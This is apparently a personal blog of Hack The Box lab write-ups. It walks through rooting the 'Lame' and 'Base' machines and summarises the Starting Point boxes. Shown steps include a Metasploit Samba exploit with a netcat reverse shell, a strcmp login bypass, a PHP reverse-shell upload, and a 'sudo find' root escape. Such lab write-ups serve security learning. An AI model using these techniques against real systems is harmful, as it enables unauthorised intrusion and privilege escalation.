Category: Labs

I’m back once again doing Hack The Box machines. I have recently hacked all the Starting Point machines and am now moving on to the Beginner track. I’ve written a post on my experience with the Starting Point machine which you can read here. 

Reconnaissance

The name of the machine I’m going to be looking at today and the first machine in the Beginner Track is Lame. As always, we start by checking to see whether the box is online and responding to pings.

[10.10.14.84]─[[email protected]]─[/media/sf_OneDrive/Hack The Box/Machines/Lame/Output]
└──╼ [★]$ sudo ping 10.129.81.166 | tee -a ping ping.lame.txt
[sudo] password for joe:
PING 10.129.81.166 (10.129.81.166) 56(84) bytes of data.
64 bytes from 10.129.81.166: icmp_seq=1 ttl=63 time=21.4 ms
64 bytes from 10.129.81.166: icmp_seq=2 ttl=63 time=20.4 ms

As you can see, the box is responding which means it’s safe to go ahead and run an nmap scan. I tell nmap to run safe checks, version checks and operating system identification on all ports. You can see the specific command and the output below.

[10.10.14.84]─[[email protected]]─[/media/sf_OneDrive/Hack The Box/Machines/Lame/Output]
└──╼ [★]$ sudo nmap -sC -sV -O -p0- 10.129.81.166 | tee -a nmap.lame.txt
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.84
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2021-09-15T14:40:20-04:00
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 40068/tcp): CLEAN (Timeout)
|   Check 2 (port 45806/tcp): CLEAN (Timeout)
|   Check 3 (port 54683/udp): CLEAN (Timeout)
|   Check 4 (port 34973/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 1h59m26s, deviation: 2h49m56s, median: -43s
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-security-mode: Couldn't establish a SMBv2 connection.

I’ve snipped out a bunch of the stuff we don’t need to see and have highlighted the areas which I think are of interest. Going down the lists of results I see that port 21 (FTP) is open and is allowing anonymous logins. The first thing I did was to login and check to see whether there were any files on there.

[10.10.14.84]─[[email protected]]─[/media/sf_OneDrive/Hack The Box/Machines/Lame/Output]
└──╼ [★]$ sudo ftp 10.129.81.166
Connected to 10.129.81.166.
220 (vsFTPd 2.3.4)
Name (10.129.81.166:joe): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> 

As you can see, there wasn’t anything interesting. I know that VSFTPD 2.3.4 has CVE-2011-2523 associated with it which is a backdoor. The backdoor requires the user to login with a smiley face and it grants them access. I attempted to do this but had no luck. I used the Metasploit module but that didn’t work so I it’s safe to say it’s patched. Moving on.

Foothold Hack

So from here we move on to the next port in the list, 138 and 445 (Samba). I can see that version of Samba is 3.0.20 let’s check SearchSploit to see whether there are any known vulnerabilities for this particular version.

[10.10.14.84]─[[email protected]]─[/media/sf_OneDrive/Hack The Box/Machines/Lame/Output]
└──╼ [★]$ sudo searchsploit Samba 3.0.20
------------------------------------------
 Exploit Title                                                                                                                                              |  Path
------------------------------------------
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass                                                                                                      | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)                                                                            | unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow                                                                                                                       | linux/remote/7701.txt
Samba < 3.0.20 - Remote Heap Overflow                                                                                                                       | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC)                                                                                                               | linux_x86/dos/36741.py
------------------------------------------

As you can see from the snippet of code above, it looks like there is a command execution vulnerability and that there is a Metasploit module for. Let’s launch Metasploit (using msfconsole) and see if we can find and use the module.

msf6 > search samba 3.0.20
Matching Modules
================
   #  Name                                Disclosure Date  Rank       Check  Description
   -  ----                                ---------------  ----       -----  -----------
   0  exploit/multi/samba/usermap_script  2007-05-14       excellent  No     Samba "username map script" Command Execution

Ok we have found the exploit, we can select it by running ‘use 0’. Once we have the module loaded we can run ‘options’ to see what we need to populate the options with.

sf6 exploit(multi/samba/usermap_script) > options
Module options (exploit/multi/samba/usermap_script):
   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  10.129.81.166    yes       The target host(s), range CIDR identifier, 
   RPORT   139              yes       The target port (TCP)
Payload options (cmd/unix/reverse_netcat):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.84      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
Exploit target:

   Id  Name
   --  ----
   0   Automatic

It looks like we only have to set the RHOSTS option. The RHOSTS option is the setting you use to declare the IP address of the remote host. The RPORT is the remote port, as you can see it is targeting port 139. The LHOST and LPORT options are our localhost IP and port that we want the machine to connect back to. With all that configured, let’s run the ‘exploit’ command and see if it creates a session.

 msf6 exploit(multi/samba/usermap_script) > exploit
[*] Started reverse TCP handler on 10.10.14.84:4444 
[*] Command shell session 1 opened (10.10.14.84:4444 -> 10.129.81.166:34291) at 2021-09-15 20:06:43 +0100
whoami
root

Hallelujah, praise the hack gods. Metasploit successfully created a session on the remote machine and not only that but it looks like we are root too. That means no privilege escalation is required on this machine. Let’s grab the root flag.

cat /root/root.txt
f40--------haXez--------712

We still have to submit the user flag so we need to go hunting for it. Let’s check home directory and see if there are any users and whether any of them is hiding the user flag.

ls /home
ftp
makis
service
user
ls /home/makis
user.txt
cat /home/makis/user.txt
8af--------haXez--------3fb

Starting Point on Hack The Box is a collection of “Very Easy” machines designed to give an introduction to the hacking world. This is the red pill that will have you feeling like Alice tumbling down the rabbit hole. Unfortunately, there are multiple rabbit holes and not all of them lead to Wonderland. Alice may have met the Cheshire Cat, but you will encounter many different types of Cat that will assist you on your journey. As Morpheus once said:

“You take the blue pill, the story ends. You wake up in your bed and believe whatever you want to. You take the red pill, you stay in Wonderland, and I show you how deep the rabbit hole goes. Remember, all I’m offering is the truth. Nothing more.”

Morpheus

Let’s begin! My name is Zero Cool (kidding! it’s Joe) and I’ve been working in Cyber for around 2 years (at the time of writing). I’ve worked in tech for almost 10 years doing various jobs but have always been drawn to hacking. These machines continuously taught me new techniques. I have write-ups of each box if you want to check them out but here I will mostly be summarising my experience with the machines.

Archetype

This is a machine that requires you to perform SMB enumeration to get credentials for a MSSQL database. The SMB enumeration was straight forward but I’ve never used the Impacket database connection tool before. I wouldn’t have even known about it if it wasn’t for this box. Once authenticated, I needed to use xp_cmdshell to execute a PowerShell command to download a reverse shell PowerShell script. After the reverse shell had connected back to my machine, further enumeration was required to grab the Administrator password from the history. This machine was a lot of a fun and I learnt about some new tools.

Starting Point Oopsie

This machine required me to leverage broken access control restrictions to impersonate another higher privilege user. This one done using the tool Burp Suite. I’m quite familiar with Burp Suite but have never encountered a situation quite like this before. I’ve brute force parameters before to get API’s to dump information that they should but this was fairly unique. Once I was able to impersonate super admin it was possible to upload a reverse shell and have the machine connect back to me. Escalating privileges to root required manipulating a script that wasn’t calling a tool by the full path. This was something I had done before but am not overly confident doing. I enjoyed this box as understanding the vulnerabilities was straight forward. 

Starting Point Vaccine

This was the next target to succumb to my amateur hacking skills. This machine required downloading a password protected ZIP archive from FTP and then using tools to generate and crack the password hash of the ZIP. The ZIP contained a PHP index file which had some hardcoded MD5 encrypted credentials. The MD5 was cracked and then it was possible to login to the website. The next step was to perform an SQL injection attack while passing it my session cookie. The SQL injection was used to get a shell on to the machine which was then upgraded using bash. I then grabbed the postgres password and switched to that user. Postgres had the sudo ability to edit a particular file with vi which I exploited to escape to root. 

Starting Point Shield

This was the next victim on the list and gave me more trouble than I expected. This machine required exploiting WordPress by adding a backdoor to one of the themes PHP files. Once the backdoor was embedded it was possible to command it to download and execute reverse shell. Once on the machine I discovered that I had to use JuicyPotato to execute nc.exe to spawn a privileged reverse shell. I had not used JuicyPotato before and had a bit of trouble choosing which process to attach it to. I’m not entirely certain how it works yet so I need to do more research on it. This box was a lot of fun though and taught me about JuicyPotato. 

Starting Point Pathfinder

This machine was next on my hit list and was my first encounter with a Domain Controller on during the Starting Point series. I’ve pen tested domain controllers before, so I sort of knew what to look out for. There were several ports that I targeted right away but the service I needed to poke was LDAP. Using the tool ldapdomaindump and authenticating as Sandra it was possible to dump user information. Then using another tool from Impacket it was possible to trick the server in to giving me a user hash which I cracked offline. With the hash cracked it was possible to perform a DCSync attack and grab the Administrator hash which gave us full access. This was a great box which I feel simulates possible configuration weaknesses that you might find in the real world.

Starting Point Included

This machine was next to get isolated and hacked by my 1337 haxor skills. Seriously though this was another fun box that leveraged directory traversal or local file inclusion. It was an obvious foothold initially due to the naming convention of the parameter used to call the index file. The machine had TFTP running so it was possible to put a reverse shell on it. By leveraging the local file inclusion attack to determine the path of the TFTP directory it was possible to call the reverse shell. 

Starting Point Markup

This was a fun machine that taught me about XML entity injection. I need to brush up on this subject so I’m going to check out the Portswigger web academy labs on it. The XXE attack allowed me to retrieve a user’s private key which I could then use to SSH to the box. After running winPEAS I found a file that the user had access to that was running as a scheduled task. Furthermore, we could echo content into this file so we dropped a netcat executable on the machine. I then echoed a command into the file so that it would create a reverse shell back to our machine the next time it ran. Great box but ran in to a few issues with it. Check out the post for more details.

Starting Point Guard

This was a relatively simple machine with a neat trick for privilege escalation. This machine used credentials from the previous machine to gain SSH access. Once on the box I needed to use the built-in shell in man pages to escape the restricted shell and cat the user flag. The shell was still restricted as I was unable to use wget or curl to download any files. I used SSH to pipe LinPEAS on to the machine. LinPEAS found that root logins were permitted with passwords and that my use could access the shadow file with the root hash inside it. Cracking the file offline allowed me to SSH to the machine as root and capture the root flag. 

Starting Point Base

This was the last machine in the Starting Point category on Hack The Box and it was a lot of fun to complete. I will admit that the web application on the machine ran horrendously slow which become tiresome at times. Base required me to snoop through listed directories and grab a PHP file containing the source code of the login page. The source code revealed it was configured in a vulnerable way that would allow me to bypass the authentication page. By intercepting and manipulating the login request it was possible to access an upload page. After uploading a reverse shell and gaining access to the box I needed to search through the web files and move laterally to the John user. After that it was a GTFOBin on the find command that elevated me to root and allowed me to capture the final flag. 

Conclusion

This was a fun learning experience that made me think about the solutions. I spent a lot of time researching each of the findings and have a huge list of things I still have to look in to. I would like to revisit each of the machines once I have levelled up my skillset to see if there are any other ways that they could be completed. I’m drawn to Cyber Security and hacking like a moth to a flame so this was a really fun challenge for me. If you have an interest in tech or are already working in tech and want to improve your skillset then I highly recommend giving this a go.

This is the final machine of the Starting Point category on Hack The Box. I’ve been looking forward to doing this machine since I completed the last one. In traditional techy fashion however, I‘ve just spent most of the evening trying to work out why my Virtual Machine kept crashing. For some reason it kept producing invalid memory address registers. After an update, a reboot, and some tinkering, it now appears to be fine. That has nothing to do with this though so let’s jump right in.

Reconnaissance

Ok so first, after spawning the machine we ping it to check that it’s online.

[10.10.14.57]─[[email protected]]─[/media/sf_E_DRIVE/OneDrive/Hack The Box/Machines/Base/Output]
└──╼ [★]$ sudo ping 10.10.10.48 | tee -a ping.10.10.10.48.txt
PING 10.10.10.48 (10.10.10.48) 56(84) bytes of data.
64 bytes from 10.10.10.48: icmp_seq=1 ttl=63 time=21.6 ms
64 bytes from 10.10.10.48: icmp_seq=2 ttl=63 time=20.5 ms

The machine is talking to us! we have it right where we want it! Time to hack it with nmap.

[10.10.14.57]─[[email protected]]─[/media/sf_E_DRIVE/OneDrive/Hack The Box/Machines/Base/Output]
└──╼ [★]$ sudo nmap -sC -sV -O -p0- 10.10.10.48 | tee -a nmap.10.10.10.48.txx
Starting Nmap 7.91 ( https://nmap.org ) at 2021–09–14 17:41 BST
Nmap scan report for 10.10.10.48
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 f6:5c:9b:38:ec:a7:5c:79:1c:1f:18:1c:52:46:f7:0b (RSA)
|_ 256 b8:65:cd:3f:34:d8:02:6a:e3:18:23:3e:77:dd:87:40 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn’t have a title (text/html)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

It looks like we have a webserver running on Ubuntu. Before I look at the site, I will launch a dirb scan to check for any interesting directories that we can hack.

[10.10.14.57]─[[email protected]]─[/media/sf_OneDrive/Hack The Box/Machines/Base/Scripts]
└──╼ [★]$ sudo dirb http://10.10.10.48 /usr/share/dirb/wordlists/big.txt -w
— — — — — — — -
DIRB v2.22 
By The Dark Raver
— — — — — — — — -
START_TIME: Tue Sep 14 22:51:33 2021
URL_BASE: http://10.10.10.48/
WORDLIST_FILES: /usr/share/dirb/wordlists/big.txt
OPTION: Not Stopping on warning messages
 — — — — — — — — -
GENERATED WORDS: 20458
— — Scanning URL: http://10.10.10.48/ — — 
==> DIRECTORY: http://10.10.10.48/_uploaded/ 
==> DIRECTORY: http://10.10.10.48/login/ 
+ http://10.10.10.48/server-status (CODE:403|SIZE:276) 
==> DIRECTORY: http://10.10.10.48/static/ 
— — Entering directory: http://10.10.10.48/_uploaded/ — — 
(!) WARNING: Directory IS LISTABLE. No need to scan it. 
 (Use mode ‘-w’ if you want to scan it anyway)
— — Entering directory: http://10.10.10.48/login/ — — 
(!) WARNING: Directory IS LISTABLE. No need to scan it. 
 (Use mode ‘-w’ if you want to scan it anyway)
- — Entering directory: http://10.10.10.48/static/ — — 
(!) WARNING: Directory IS LISTABLE. No need to scan it. 
 (Use mode ‘-w’ if you want to scan it anyway)
==> DIRECTORY: http://10.10.10.48/static/fonts/ 
==> DIRECTORY: http://10.10.10.48/static/images/ 

Interesting, it looks like the server is configured to allow directory listings. This is significant security oversight. This allows us to browse the directories and determine the file structure which could assist with a hack. This setting can easily be changed in the server configuration but for now let’s leverage that weakness and snoop around.

There are some interesting directories and files on the server, one of which is named login.php.swp and contains the following PHP code:

<?php
session_start();
if (!empty($_POST[‘username’]) && !empty($_POST[‘password’])) {
require(‘config.php’);
if (strcmp($username , $_POST[‘username’]) == 0) {
if (strcmp($password, $_POST[‘password’]) == 0) {
$_SESSION[‘user_id’] = 1;
header(“Location: upload.php”)
} else {
print(“<script>alert(‘Wrong Username or Password’)</script>”);
}} else {
print(“<script>alert(‘Wrong Username or Password’)</script>”);
}

Foothold Hack

It appears as if the username and passwords are being put in to a short array and checked with strcmp. By intercepting and changing the request in Burp we can hack the syntax with an array of our own, and can cause the application to misbehave and hopefully bypass authentication. First, we will need to navigate to the site and submit a login request. We will then need to ensure the browser is configured to send the requests to Burp and that Burp intercept is on.

Second, As soon as Burp has intercepted the request we need to modify it slightly to add our own empty arrays. These arrays need to be added at the end of username and password before the input is received. You can see from the screenshot below that I have added an open and close square bracket to add the array.

Finally, we forward the request, and the subsequent set-cookie request with Burp and wait for the web application to respond. The page we are redirected to is an upload page. We know from our dirb results that there is an _uploaded directory. If we assume that is where the file upload puts files then we should be able to upload a reverse shell and hack it from there.

I used the pentestermonkey’s PHP Reverse Shell and uploaded it to the application. I started my netcat listener and then curled the URL to trigger the PHP reverse shell.

[10.10.14.57]─[[email protected]]─[/media/sf_OneDrive/Hack The Box/Machines/Base/Scripts]
└──╼ [★]$ sudo curl http://10.10.10.48/_uploaded/shell.php

As expected. The shell worked and I was given acces to the box. Before we do anything else, we need to upgrade our shell so let’s run that Python 1 liner.

$ python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
[email protected]:/$

Now that that’s sorted, let’s check out the rest of the website files. When websites connect to databases, they require a database configuration file. Database configuration files contain passwords that could be used to gain access to sensitive information. There are other files like htaccess and htpasswd that could contain sensitive information too so it’s always a good idea to check them.

[email protected]:/$ cat /var/www/html/login/config.php
cat /var/www/html/login/config.php
<?php
$username = “admin”;
$password = “thisisagoodpassword”;

*Smug grin intensifies* The config.php file contains a password. We know this is the password that is required to login to the application, but we don’t know whether it has been reused on the system anywhere. With that in mind, let’s check the home directory and see what users are on the system.

[email protected]:/$ ls /home
john
[email protected]:/$ ls /home/john
user.txt

Privilege Escalation Hack

Sorry John but it looks like you are going to be our victim today. I’m sure you’re lovely guy but if you have reused your password then you deserved to be pwned! (joking, or am I?). Now that we have a username and password, Lets try and switch user to john.

[email protected]:/$ su john
su john
Password: thisisagoodpassword
[email protected]:/$

I believed in you john and you let me down. While we’re here lets grab the user flag from johns home directory.

[email protected]:/$ cat /home/john/user.txt
cat /home/john/user.txt
0011000100110011<haXez>0011001100110111

With that out the way, lets see how we can elevate our provides and grab the root flag. The first thing we need to know is what john can run, besides his security posture in to the ground.

[email protected]:/$ id
uid=1000(john) gid=1000(john) groups=1000(john)[email protected]:/$ sudo -l
[sudo] password for john: thisisagoodpassword
Matching Defaults entries for john on base:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User john may run the following commands on base:
(root : root) /usr/bin/find

It appears john has permission to run the find command as root. Shame he couldn’t FIND a better password. Moving forward we should check whether find has any methods of escape, like the one we performed on Guard with the man command. In order to this, I checked the website GTFOBins and it says the following command can be used to escape a restricted shell. Hopefully that means it will drop us in to a root shell.

[email protected]:/$ sudo find . -exec /bin/sh \; -quit
# whoami
root

Now all that’s left to do is grab the root flag and we’re done with starting point.

# cat /root/root.txt
0011000100110011<haXez>0011001100110111

Check out some of my other posts including Archetype, Oopsie, Vaccine, Shield, Pathfinder, Included and Markup.